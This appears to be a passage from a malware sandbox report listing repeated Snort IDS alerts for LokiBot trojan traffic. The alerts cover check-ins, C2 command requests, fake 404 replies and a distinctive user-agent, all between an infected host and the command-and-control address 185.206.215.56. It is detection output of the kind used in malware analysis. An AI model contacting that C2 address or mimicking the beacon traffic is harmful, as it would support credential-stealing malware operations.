                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49195
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49196
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49197
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49198
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49199
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49200
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49201
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49202
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49203
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49204
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49205
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49206
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49207
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49208
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49209
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49210
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49211
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49212
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49213
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49214
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49215
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49216
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49217
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49218
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49219
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49220
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49221
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49222
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49223
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49224
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49225
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49226
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49227
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49228
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49229
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49230
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49231
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49232
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49233
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49234
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49235
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49236
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49237
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49238
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.206.215.56:80
